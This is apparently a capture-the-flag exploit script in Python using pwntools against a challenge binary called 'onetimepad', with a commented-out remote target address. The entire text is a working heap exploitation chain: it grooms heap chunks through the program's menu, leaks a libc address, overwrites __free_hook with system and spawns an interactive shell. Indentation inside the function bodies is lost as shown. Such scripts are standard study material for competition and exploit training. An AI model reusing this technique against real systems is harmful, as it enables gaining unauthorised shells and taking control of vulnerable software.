Rating: 0

```
#!/usr/bin/env python
#Author: r4j

from pwn import *
from time import sleep

context.terminal=['tmux','new-window']
e = ELF('./onetimepad')
p = process('./onetimepad')
#p = remote('88.198.154.140',31336)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

def add(data):
p.recvuntil('> ')
p.sendline('w')
sleep(0.2)
p.sendline(data)

def read(idx):
p.recvuntil('> ')
p.sendline('r')
sleep(0.2)
p.sendline(str(idx))
return p.recvline().strip()

def edit(idx,data):
p.recvuntil('> ')
p.sendline('e')
sleep(0.2)
p.sendline(str(idx))
sleep(0.2)
p.sendline(data)

def junk(size):
add('A'*size)

add('\x00'*0x650)
read(0)

add('A'*8+p64(0x21)) #0
add('A'*0x10) #1 00
add('A'*0x10) #2 20
add('A'*0x10) #3 40
add('A'*0x10) #4 60
add('A'*0x3a8+p64(0x21)) #5 80
add('A'*8+p64(0x21))

read(3)
read(4)

edit(4,'')

add('a') #3
add('L'*8+p64(0x431)) #4

read(1)
add('A'*0x10) #1
add('/bin/sh;'+'A'*0x28) #7

leak = u64(read(3).ljust(8,'\x00')) - 0x1bbca0
log.info('libc leak: '+hex(leak))
libc.address = leak

read(1)
read(4)

add('A'*0x10+p64(libc.symbols['__free_hook']))
add('a')
add(p64(libc.symbols['system']))

read(7)
p.interactive()
```